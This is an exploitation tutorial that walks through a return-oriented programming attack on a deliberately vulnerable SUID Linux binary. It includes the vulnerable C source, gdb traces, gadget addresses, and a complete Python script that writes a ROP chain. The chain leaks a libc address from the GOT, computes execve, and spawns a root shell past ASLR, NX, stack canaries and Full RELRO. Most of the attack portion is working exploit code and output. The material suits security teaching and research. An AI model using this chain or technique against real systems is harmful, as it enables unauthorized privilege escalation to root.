An Introduction to Return-Oriented Programming (Linux)
INTRODUCTION:
In 1988, a buffer overflow was exploited for the first time to compromise many systems. More than 20 years later, applications are still vulnerable, despite the efforts made to harden them.
In the past, the hard part was discovering bugs; nobody worried much about writing exploits because it was so easy. Nowadays, exploiting buffer overflows is difficult as well, because of advanced defensive technologies.
Several mitigations, such as ASLR and non-executable memory sections, are combined to make exploit development harder than ever.
In this tutorial, we describe how to defeat or bypass ASLR, NX, ASCII ARMOR, SSP and RELRO at the same time, in a single attempt, using a technique called Return-Oriented Programming (ROP).
Let's begin with some basic/old definitions:
→ NX: non-executable memory sections (stack, heap), which prevent the execution of arbitrary injected code. This protection is easy to defeat with a correct ret2libc attack or with the borrowed code chunks technique.
→ ASLR: Address Space Layout Randomization, which randomizes the location of memory regions (stack, heap and shared objects). It can be bypassed by brute-forcing the return address.
→ ASCII ARMOR: maps libc at addresses that start with a NULL byte. This hardens the binary against ret2libc attacks, since a string-based overflow cannot copy an address that contains a NULL byte.
→ RELRO: another exploit mitigation technique to harden ELF binaries. It has two modes:
Partial RELRO: the non-PLT GOT is read-only.
Compile command: gcc -Wl,-z,relro -o bin file.c
Full RELRO: the entire GOT, including the PLT GOT, is read-only.
Compile command: gcc -Wl,-z,relro,-z,now -o bin file.c
→ SSP: Stack Smashing Protection, which places a canary value between the local variables and the saved return address and checks it before the function returns.
Our exploit will bypass all of these mitigations and still be reliable.
So let's go.
OVERVIEW OF THE CODE:
Here is the vulnerable code. The binary and the code are included at the end of the tutorial.
[c]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>

void fill(int,int,int*);

int main(int argc,char** argv)
{
    FILE* fd;
    int in1,in2;
    int arr[2048];
    char var[20];

    if (argc !=2){
        printf("usage : %s \n",*argv);
        exit(-1);
    }
    fd = fopen(argv[1],"r");
    if(fd == NULL)
    {
        fprintf(stderr,"%s\n",strerror(errno));
        exit(-2);
    }
    memset(var,0,sizeof(var));
    memset(arr,0,2048*sizeof(int));
    /* read the file two lines at a time: an offset, then a value */
    while(fgets(var,20,fd))
    {
        in1 = atoll(var);
        fgets(var,20,fd);
        in2 = atoll(var);
        /* fill array */
        fill(in1,in2,arr);
    }
}

void fill(int of,int val,int *tab)
{
    /* no bounds check: 'of' can index outside the 2048-entry array */
    tab[of]=val;
}
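First, let's explain what the code does.
It opens the file named on the command line and reads it two lines at a time: the first line of each pair is stored in in1 and used as an offset into the array, and the second is stored in in2 and used as the value for that offset. It then calls the fill function to write into the array:
tab[in1]=in2 ;
Because in1 is never checked against the bounds of the array, we can write an arbitrary 32-bit value at any offset from arr. When in1 is the offset of the saved return address, we can write whatever we want there.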
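To make the input format concrete, here is a minimal Python sketch of how the read loop interprets a file. The names atoll_as_int32 and replay are hypothetical helpers, not part of the original program. The sketch assumes every line is shorter than 19 characters (so one fgets call consumes one line) and that storing the atoll result in an int keeps the low 32 bits, as on a typical 32-bit x86 build.

```python
import re

def atoll_as_int32(text):
    """Approximate `int x = atoll(text);` on a 32-bit x86 build (assumed behaviour)."""
    match = re.match(r"\s*([+-]?\d+)", text)
    value = int(match.group(1)) if match else 0   # atoll yields 0 when no digits are found
    value &= 0xFFFFFFFF                           # keep the low 32 bits
    return value - (1 << 32) if value & 0x80000000 else value

def replay(lines):
    """Return the (offset, value) pairs the read loop would pass to fill()."""
    writes = []
    it = iter(lines)
    for first in it:
        in1 = atoll_as_int32(first)
        # A failed second fgets leaves the buffer unchanged, so in2 repeats in1.
        second = next(it, first)
        in2 = atoll_as_int32(second)
        writes.append((in1, in2))
    return writes

print(replay(["1\n", "10\n"]))
```

Each pair returned by replay corresponds to one tab[in1]=in2 write, whether or not the offset lies inside the array.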
Let's compile the vulnerable code:
[cpp]
gcc -o vuln2 vuln2.c -fstack-protector -Wl,-z,relro,-z,now
chown root:root vuln2
chmod +s vuln2
And we check the resulting binary using checksec.sh:
[cpp]
user@protostar:~/course$ checksec.sh --file vuln2
RELRO       STACK CANARY   NX          PIE     RPATH     RUNPATH     FILE
Full RELRO  Canary found   NX enabled  No PIE  No RPATH  No RUNPATH  vuln2
user@protostar:~/course$
So the binary is hardened, but a motivated attacker can still succeed.
SSP only detects an overflow that tramples the canary on its way to the saved return address. Here we can write to the saved return address directly, by offset, without touching the canary, so the check passes and SSP does not stop our exploit.
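The difference between a classic contiguous overflow and this indexed write can be illustrated with a toy model of the stack frame. This is only a sketch: the canary position, the canary value and the original return address below are hypothetical, chosen for illustration, and do not come from the real binary.

```python
ARR_WORDS = 2048          # size of arr in the vulnerable program
CANARY_INDEX = 2055       # hypothetical slot holding the canary
RET_INDEX = 2060          # hypothetical slot holding the saved return address
CANARY = 0x5EC0DE00       # hypothetical canary value
ORIGINAL_RET = 0x11111111 # hypothetical original return address

def new_frame():
    """Build a list of 32-bit words standing in for main's stack frame."""
    frame = [0] * (RET_INDEX + 1)
    frame[CANARY_INDEX] = CANARY
    frame[RET_INDEX] = ORIGINAL_RET
    return frame

def linear_overflow(frame, word):
    """Classic overflow: every word from the end of arr up to the return address is overwritten."""
    for i in range(ARR_WORDS, RET_INDEX + 1):
        frame[i] = word

def indexed_write(frame, index, word):
    """The primitive offered by fill(): a single word written at a chosen index."""
    frame[index] = word

def canary_ok(frame):
    """The check SSP performs before the function returns."""
    return frame[CANARY_INDEX] == CANARY

smashed = new_frame()
linear_overflow(smashed, 0x41424344)
print("linear overflow, canary intact:", canary_ok(smashed))

precise = new_frame()
indexed_write(precise, RET_INDEX, 0x41424344)
print("indexed write, canary intact:", canary_ok(precise))
```

In the model, only the indexed write changes the return address while leaving the canary untouched, which is why the canary check does not fire.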
OWNING EIP:
Let's open the binary with gdb and disassemble the main function:
gdb$ disas main
Dump of assembler code for function main:
0x08048624 <main+0>: push ebp
...
0x08048754 <main+304>: mov DWORD PTR [esp+0x202c],eax
0x0804875b <main+311>: lea eax,[esp+0x2c]
0x0804875f <main+315>: mov DWORD PTR [esp+0x8],eax
0x08048763 <main+319>: mov eax,DWORD PTR [esp+0x202c]
0x0804876a <main+326>: mov DWORD PTR [esp+0x4],eax
0x0804876e <main+330>: mov eax,DWORD PTR [esp+0x2030]
0x08048775 <main+337>: mov DWORD PTR [esp],eax
0x08048778 <main+340>: call 0x80487be
0x0804877d <main+345>: mov eax,DWORD PTR [esp+0x2034]
0x08048784 <main+352>: mov DWORD PTR [esp+0x8],eax
...
Let's create a simple file named 'simo.txt' and put the following in it:
[plain]
1
10
We set some breakpoints:
[cpp]
gdb$ b *main
Breakpoint 1 at 0x8048624
gdb$ b *0x08048778
Breakpoint 2 at 0x8048778
gdb$ run file
Breakpoint 1, 0x08048624 in main ()
gdb$ x/x $esp
0xbffff7cc: 0xb7eabc76
gdb$ continue
Breakpoint 2, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770: 0x00000001 0x0000000a 0xbfffd79c 0x00000000
gdb$ x/i 0x08048778
0x8048778 <main+340>: call 0x80487be
gdb$
At the first breakpoint, ESP points to the saved return address of main:
0xbffff7cc : the address where main's return address is stored
0xbfffd79c : the address of arr
If you're familiar with stack frames, you'll notice that we made the call fill(1,10,arr),
which then does the following: arr[1]=10 ;
The distance between the address of arr and the saved return address is 8240 bytes
(0xbffff7cc-0xbfffd79c = 8240). Because we are indexing an array of integers, we must divide the result by 4 (sizeof(int)), so 8240/4 = 2060.
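The arithmetic above can be checked with a few lines of Python. The helper name slot_index is hypothetical; the two addresses are the ones printed by gdb in this session and will differ on another machine or run.

```python
ARR_ADDR = 0xbfffd79c   # address of arr, third argument of fill() in the gdb session
RET_SLOT = 0xbffff7cc   # address holding main's return address (ESP at main+0)
WORD = 4                # sizeof(int) on this 32-bit target

def slot_index(target, base=ARR_ADDR):
    """Translate an absolute stack address into an index usable as tab[index]."""
    delta = target - base
    if delta % WORD:
        raise ValueError("target is not aligned on an int boundary relative to arr")
    return delta // WORD

print(RET_SLOT - ARR_ADDR, slot_index(RET_SLOT))
```

The same helper works for any other stack address we want to reach through the array.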
So if we use an offset of 2060, we can overwrite the saved return address and therefore control EIP. Let's check.
Put the following in simo.txt:
[cpp]
2060
1094861636
The result is:
[cpp]
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: B7FD5FF4 ECX: B7FDF000 EDX: 00000000 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: BFFFF848 ESP: BFFFF7D0 EIP: 41424344
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x41424344
0x41424344 in ?? ()
gdb$
So we successfully own EIP and have bypassed Stack Smashing Protection.
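As a quick sanity check, the decimal value written at offset 2060 can be converted back to the address that ended up in EIP. The helper name describe is hypothetical.

```python
import struct

def describe(value):
    """Return the hex form of a 32-bit value and its little-endian byte layout in memory."""
    return hex(value), struct.pack("<I", value)

print(describe(1094861636))
```

The input file must contain decimal numbers because the program parses them with atoll, which is why the recognizable marker 0x41424344 is written as 1094861636.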
Let's build our exploit now.
BUILDING THE EXPLOIT:
Our aim now is to build a ROP chain that calls execve(). As the relocation table below shows, the binary has no GOT entry for this function, and libc is randomized.
So we will first leak the address of a libc function from the GOT, then do some trivial arithmetic to get the exact address of execve in libc.
And remember that we cannot overwrite the GOT because of « Full RELRO ».
[cpp]
readelf -r vuln2
08049fcc 00000107 R_386_JUMP_SLOT 00000000 __errno_location
08049fd0 00000207 R_386_JUMP_SLOT 00000000 strerror
08049fd4 00000307 R_386_JUMP_SLOT 00000000 __gmon_start__
08049fd8 00000407 R_386_JUMP_SLOT 00000000 fgets
08049fdc 00000507 R_386_JUMP_SLOT 00000000 memset
08049fe0 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main
08049fe4 00000707 R_386_JUMP_SLOT 00000000 atoll
08049fe8 00000807 R_386_JUMP_SLOT 00000000 fopen
08049fec 00000907 R_386_JUMP_SLOT 00000000 printf
08049ff0 00000a07 R_386_JUMP_SLOT 00000000 fprintf
08049ff4 00000b07 R_386_JUMP_SLOT 00000000 __stack_chk_fail
08049ff8 00000c07 R_386_JUMP_SLOT 00000000 exit
Let's leak the address of printf (you can choose any GOT entry)
[cpp]
gdb$ x/x 0x08049fec
0x8049fec <_GLOBAL_OFFSET_TABLE_+44>: 0xb7edbf90
gdb$ p execve
$9 = {<text variable, no debug info>} 0xb7f2c170 <execve>
gdb$ p 0xb7f2c170-0xb7edbf90
$10 = 328160
gdb$
The offset between printf and execve is 328160 bytes.
So if we add 328160 to the libc address of printf, which we read from its GOT entry at run time, we get the libc address of execve dynamically.
[cpp]
execve = printf@libc+ 328160
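The calculation can be written down as a short Python sketch. The two addresses are the ones shown by gdb for this particular run and libc build; the function name execve_from_leak is hypothetical.

```python
PRINTF_LIBC = 0xb7edbf90   # value stored in printf's GOT entry during the gdb session
EXECVE_LIBC = 0xb7f2c170   # address of execve printed by gdb in the same session

# Both symbols live in the same libc mapping, so their distance is fixed for this libc build.
OFFSET = EXECVE_LIBC - PRINTF_LIBC

def execve_from_leak(printf_addr):
    """Derive execve's address from a leaked printf address, wrapping at 32 bits."""
    return (printf_addr + OFFSET) & 0xFFFFFFFF

print(OFFSET, hex(execve_from_leak(PRINTF_LIBC)))
```

The offset only holds for the exact libc version on the target; a different libc would need the subtraction to be redone.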
So we must find some ROP gadgets.
The next step is to find useful gadgets from which to build a chain of instructions. We'll use ROPEME to do that.
We generate a .ggt file that contains short instruction sequences, each ending in a ret.
Our goal is to execute a few instructions, then return into data that we control.
[cpp]
ROPeMe> generate vuln 6
We need the following gadgets to build our exploit:
[cpp]
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
0x804861fL: call eax ; leave ;;
0x804849cL: pop eax ; pop ebx ; leave ;;
So let's build our ROP chain using those gadgets.
Our attack is then: load 328160 into EAX and 0x138e9ff4 into EBX. You may ask: what is 0x138e9ff4?
Well we have a gadget like this:
[cpp]
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
We need ebx-0xb8a0008 = printf@got, so ebx = printf@got + 0xb8a0008 = 0x08049fec + 0xb8a0008 = 0x138e9ff4
So EAX = 328160 and EBX = 0x138e9ff4.
When «add eax [ebx-0xb8a0008]» is executed, EAX will contain the address of execve, computed dynamically.
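The effect of this gadget can be simulated in Python. This is a sketch of the register arithmetic only: the memory dictionary stands in for the process memory and holds the printf address observed in the gdb session, and the function name add_eax_mem is hypothetical.

```python
PRINTF_GOT = 0x08049fec    # GOT slot of printf, from readelf -r
DISP = 0x0b8a0008          # displacement hard-coded in the gadget
MASK = 0xFFFFFFFF          # registers are 32 bits wide

# Value to preload into EBX so that ebx - DISP lands exactly on printf's GOT slot.
EBX = (PRINTF_GOT + DISP) & MASK

# Stand-in for process memory: the GOT slot holds printf's run-time libc address.
memory = {PRINTF_GOT: 0xb7edbf90}

def add_eax_mem(eax, ebx, mem):
    """Model `add eax, [ebx-0xb8a0008]`: read a word from memory and add it to EAX."""
    address = (ebx - DISP) & MASK
    return (eax + mem[address]) & MASK

print(hex(EBX), hex(add_eax_mem(328160, EBX, memory)))
```

Because the gadget reads the GOT slot at run time, the result follows whatever address the loader placed there, with no need to know it in advance.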
After that, we use call eax to invoke execve, without forgetting to put the correct parameters on the stack.
There is a small problem that must be resolved first. When the leave instruction of our first gadget is executed, ESP is reloaded from EBP, so the stack pointer moves away from the words we wrote next to the saved return address of main, and we lose our controlled data. The solution is easy and similar to what we did earlier: with some trivial calculations, we find where ESP points after the leave and write the rest of the chain there.
[cpp]
0x8048778 <main+340>: call 0x80487be
Breakpoint 1, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770: 0x0000080c 0x0804849c 0xbfffd79c 0x00000000
We continue.
[cpp]
0x804849f <_init+47>: ret
0x0804849f in _init ()
gdb$ x/x $esp
0xbffff84c: 0x0804886e
When «leave» is executed, ESP points to another area of the stack, one we have not written to yet.
Let's work out exactly where ESP points: as we did earlier, we subtract the address of arr from ESP and divide by 4: (0xbffff84c-0xbfffd79c)/4 = 2092
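The jump of ESP can be reproduced with a small model of the leave instruction. The sketch assumes EBP holds 0xbffff848 when the gadget runs, which is the value shown in the register dump of the earlier crash; the function name leave and the read_word callback are hypothetical.

```python
ARR_ADDR = 0xbfffd79c      # address of arr in the gdb session
EBP_AT_GADGET = 0xbffff848 # assumed EBP value, taken from the earlier register dump

def leave(ebp, read_word):
    """Model `leave`, which is `mov esp, ebp` followed by `pop ebp`."""
    esp = ebp                   # mov esp, ebp
    new_ebp = read_word(esp)    # pop ebp reads the word at the new top of stack
    esp += 4                    # and moves ESP past it
    return esp, new_ebp

# The popped EBP value does not matter here, so the reader returns a dummy 0.
esp_after, _ = leave(EBP_AT_GADGET, lambda address: 0)
print(hex(esp_after), (esp_after - ARR_ADDR) // 4)
```

The ret that follows leave therefore takes its target from array offset 2092, which is where the next gadget address has to be written.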
So our payload will look like this:
[python]
#!/usr/bin/python
r = "\n"
p = str(2060) + r          # offset of return address
p += str(0x804849c) + r    # pop eax ; pop ebx ; leave ;;
p += str(2061) + r
p += str(328160) + r       # EAX
p += str(2062) + r
p += str(0x138e9ff4) + r   # EBX
p += str(2092) + r
p += str(0x804886e) + r    # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
p += str(2096) + r
p += str(0x41414141) + r
o = open("simo.txt", "w")  # text mode, so the script runs under Python 2 and 3
o.write(p)
o.close()
Let's see what happens:
[cpp]
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: B7F2C170 EBX: 00000002 ECX: B7FDF000 EDX: 00000000 o d I t S z a p c
ESI: 00000000 EDI: 00000000 EBP: BFFFF874 ESP: BFFFF860 EIP: 41414141
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ x/x $eax
0xb7f2c170 : 0x8908ec83
gdb$
It works!
So EAX contains the address of execve and we still control EIP. The next step is to find a printable string and two NULL values to use as the parameters of execve.
We search inside the binary using objdump:
[cpp]
user@protostar:~/course$ objdump -s vuln2 |more
vuln2: file format elf32-i386
Contents of section .interp:
8048134 2f6c6962 2f6c642d 6c696e75 782e736f /lib/ld-linux.so
8048144 2e3200 .2.
Contents of section .note.ABI-tag:
8048148 04000000 10000000 01000000 474e5500 ............GNU.
8048158 00000000 02000000 06000000 12000000 ................
0x8048154 points to the printable ASCII string « GNU », and 0x8048158 points to NULL bytes.
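These two addresses can be verified by decoding the hex dump of the .note.ABI-tag section shown above. This is a small sketch; the helper names c_string_at and word_at are hypothetical.

```python
NOTE_BASE = 0x8048148   # start address of .note.ABI-tag in the objdump output
NOTE_HEX = (
    "04000000 10000000 01000000 474e5500 "
    "00000000 02000000 06000000 12000000"
)
data = bytes.fromhex(NOTE_HEX.replace(" ", ""))

def c_string_at(address):
    """Return the NUL-terminated byte string stored at an address inside the section."""
    start = address - NOTE_BASE
    end = data.index(b"\x00", start)
    return data[start:end]

def word_at(address):
    """Return the little-endian 32-bit word stored at an address inside the section."""
    start = address - NOTE_BASE
    return int.from_bytes(data[start:start + 4], "little")

print(c_string_at(0x8048154), word_at(0x8048158))
```

Since the binary is not position independent (No PIE), these section addresses stay the same on every run, which makes them safe to hard-code in the payload.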
Our call is then execve(0x8048154, 0x8048158, 0x8049fb0), that is, the string « GNU » followed by two pointers to NULL. But we don't have a command named GNU, so we will create a wrapper named GNU.c :
[c]
#include <unistd.h>
/* compile : gcc -o GNU GNU.c */
int main()
{
    char *args[]={"/bin/sh",NULL};
    execve(args[0],args,NULL);
}
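Then add the directory where GNU is located to the $PATH environment variable (execve() itself does not search $PATH and resolves the relative name « GNU » against the current working directory, so also run vuln2 from the directory that contains GNU):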
export PATH=/yourpath/:$PATH
Our final exploit :
[python]
#!/usr/bin/python
r = "\n"
p = str(2060) + r          # offset of return address
p += str(0x804849c) + r    # pop eax ; pop ebx ; leave ;;
p += str(2061) + r
p += str(328160) + r       # offset between printf and execve
p += str(2062) + r
p += str(0x138e9ff4) + r   # printf@got + 0xb8a0008
p += str(2092) + r
p += str(0x804886e) + r    # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
p += str(2096) + r
p += str(0x804861f) + r    # call eax ; leave ;;
p += str(2097) + r
p += str(0x8048154) + r    # "GNU"
p += str(2098) + r
p += str(0x8048158) + r    # pointer to NULL
p += str(2099) + r
p += str(0x8049fb0) + r    # pointer to NULL
o = open("simo.txt", "w")  # text mode, so the script runs under Python 2 and 3
o.write(p)
o.close()
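For readers who prefer to see the layout at a glance, the same writes can be expressed as a table of array offsets and values. This is only an alternative sketch of the script above, not a different exploit; the names CHAIN and render are hypothetical, and the length check reflects the fgets(var,20,fd) call in the vulnerable program, which stores at most 19 characters per read.

```python
# Array offset -> 32-bit value, copied from the exploit script.
CHAIN = {
    2060: 0x0804849c,  # pop eax ; pop ebx ; leave ;;
    2061: 328160,      # EAX: offset between printf and execve
    2062: 0x138e9ff4,  # EBX: printf@got + 0xb8a0008
    2092: 0x0804886e,  # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
    2096: 0x0804861f,  # call eax ; leave ;;
    2097: 0x08048154,  # "GNU"
    2098: 0x08048158,  # pointer to NULL
    2099: 0x08049fb0,  # pointer to NULL
}

FGETS_LIMIT = 19  # longest line, newline included, that one fgets(var, 20, fd) call can hold

def render(chain):
    """Serialize the chain as alternating offset and value lines in decimal."""
    lines = []
    for index in sorted(chain):
        for number in (index, chain[index]):
            text = "%d\n" % number
            if len(text) > FGETS_LIMIT:
                raise ValueError("line too long for the 20-byte read buffer")
            lines.append(text)
    return "".join(lines)

print(render(CHAIN))
```

Writing the returned string to simo.txt in text mode should produce the same file as the script above, since both emit the same offsets and values in the same order.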
Let's run our attack:
[cpp]
user@protostar:~/course$ python exploit.py
user@protostar:~/course$ ./vuln2 simo.txt
# whoami
root
#
It works: we got a shell with the SUID privileges, and we bypassed all the exploit mitigations in one attempt.
If you run the binary several times under gdb, you'll notice that the addresses change from one execution to the next, yet our exploit remains reliable because it resolves the address of execve at run time.
Conclusion:
We presented a new attack against programs vulnerable to stack overflows that bypasses two of the most widely used protections (NX and ASLR) along with several others (Full RELRO, ASCII ARMOR, SSP).
With our exploit, we extracted from the address space of the vulnerable process information about the randomized addresses of libc functions, and used it to mount a classic ret2libc attack.